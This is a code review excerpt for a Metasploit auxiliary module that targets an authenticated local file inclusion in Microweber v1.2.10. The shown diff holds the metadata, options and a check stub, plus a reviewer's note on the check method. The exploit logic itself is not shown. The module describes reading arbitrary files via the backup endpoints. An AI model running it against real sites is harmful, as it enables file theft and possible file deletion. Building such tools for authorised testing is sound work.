modules/auxiliary/gather/microweber_lfi.rb

```diff
@@ -0,0 +1,179 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Microweber v1.2.10 Local File Inclusion (Authenticated)',
+        'Description' => %q{
+          Microweber v1.2.10 has a backup functionality. Upload and download endpoints can be combined to read any file from the filesystem.
+          Upload function may delete the local file if the web service user has access.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Talha Karakumru <talhakarakumru[at]gmail.com>'
+        ],
+        'References' => [
+          ['URL', 'https://huntr.dev/bounties/09218d3f-1f6a-48ae-981c-85e86ad5ed8b/']
+        ],
+        'Notes' => {
+          'SideEffects' => [ 'ARTIFACTS_ON_DISK', 'IOC_IN_LOGS' ],
+          'Reliability' => [ 'REPEATABLE_SESSION' ],
+          'Stability' => [ 'OS_RESOURCE_LOSS' ]
+        },
+        'Targets' => [
+          [ 'Microweber v1.2.10', {} ]
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2022-01-30'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path for Microweber', '/']),
+        OptString.new('USERNAME', [true, 'The admin\'s username for Microweber']),
+        OptString.new('PASSWORD', [true, 'The admin\'s password for Microweber']),
+        OptString.new('LOCAL_FILE_PATH', [true, 'The path of the local file.']),
+      ]
+    )
+  end
+
+  def check
+    check_version ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
+  end
+
+  def check_version
```

Comment:
This method should become the `check` method, and should return `CheckCode`s rather than true/false.

Reply:
Fixed.